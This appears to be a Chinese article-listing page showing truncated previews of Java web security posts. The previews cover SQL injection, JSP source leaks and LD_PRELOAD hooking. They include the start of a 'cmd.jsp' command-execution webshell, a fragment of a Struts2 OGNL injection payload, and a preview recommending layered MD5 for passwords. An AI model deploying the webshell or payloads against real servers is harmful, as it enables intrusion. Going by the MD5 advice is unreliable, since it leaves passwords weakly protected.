共 27 篇文章 |
|
阅66 转0 评0 公众公开 18-08-14 11:22 |
例如,如果应用程序使用用户的输入(如用户名和密码)来查询用户帐户的数据库表,以认证用户,而攻击者能够将恶意数据注入查询的用户名部分(和/或密码部分),查询便可能更改成完全不同的数据复制查询,可能是修改数据库的查询,或在数据库服务器上运行 Shell 命令的查询。用户的会话标识固定之后,攻击者会等待用户登录,然后利用预定义的会... 阅639 转1 评0 公众公开 18-08-14 11:22 |
Java WEB安全问题及解决方案。解决方案:配置filter对存放敏感信息的页面限制页面缓存。String sql= “SELECT * FROM USERS WHERE 1=1”; if(null != user.getUserName() && !””.equals(user.getUserName())){ sql += “ and UNAME = ‘”+user.getUserName()+”’”; } 而应使用PreparedStatement。解决方案:使用org.apache.common... 阅22 转0 评0 公众公开 18-08-14 11:21 |
Java Web基础知识之安全:人生苦短,注意安全Java Web基础知识之安全:人生苦短,注意安全2016年06月02日 19:44:56阅读数:5867.<login-config><auth-method>BASIC</auth-method><realm-name>Admin only</realm-name></login-config>使用这种Http验证方式,是将用户名和密码按照"用户名:密码"... 阅44 转0 评0 公众公开 18-08-14 11:20 |
// alert("长度为"+checkLenght);/* $("input[type=checkbox][checked]").each(function(){ //由于复选框一般选中的是多个,所以可以循环输出 alert($(this).val()); //获取到选中的行号 }); */ $("input:checkbox[name=everyline]:checked").each(function(){ //由于复选框一般选中的是多个,所以可以循环输出 ... 阅39 转0 评0 公众公开 18-08-14 10:30 |
JavaWeb 项目安全问题及其解决方案JavaWeb 项目安全问题及其解决方案2017年02月21日 23:08:07阅读数:667.数据库不要存储明文密码,应存储MD5加密后的密文,由于目前普通的MD5加密已经可以被破解,最好可以多重MD5加密,或者多种加密方式叠加组合。数据库不要存储明文密码,应存储MD5加密后的密文,由于目前普通的MD5加密已经可以被破解,最好... 阅525 转4 评0 公众公开 18-08-14 10:25 |
关于JSP源码泄漏问题的总结分析关于JSP源码泄漏问题的总结分析2015年08月10日 13:13:42阅读数:2886.试图下载JSP源代码的人(比如黑客)往往利用JSP的各种漏洞,让JSP文件在编译前被浏览器当作一个文本或其它文件发送给客户端,或在JSP装载的时候不去执行编译好的Servlet而直接读JSP的内容并发送给客户端,从而让源代码一览无余。另一种可能就... 阅102 转0 评0 公众公开 18-08-14 09:52 |
<%@ page import="java.util.*,java.io.*"%><%//// JSP_KIT//// cmd.jsp = Command Execution (unix)//// by: Unknown// modified: 27/06/2003//%><HTML><BODY><FORM METHOD="GET" NAME="myform" ACTION=""><INPUT TYPE="text" NAME="cmd">&... 阅1628 转19 评0 公众公开 18-08-14 09:21 |
ServletActionContext@getRequest(), #response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(), #response.println(#req.getRealPath(''''''''/'''''''')), #response.flush(), #response.close() }#a=(new java.lang.Buff... 阅78 转0 评0 公众公开 18-08-14 09:05 |
linux库函数劫持技术. hook.目前为止,笔者所知道的Linux系统下的一种挂钩技术,是通过libdl.so动态库中提供的一套函数dlopen(),dlsym(),dlerror(),dlclose()对动态共享链接库中的函数进行拦截的。realopen = dlsym(handle, "open");realclose = dlsym(handle, "close");gcc -fpic -c -ldl dlsym.so dlsym.export LD_PRELO... 阅1432 转4 评0 公众公开 18-08-13 16:34 |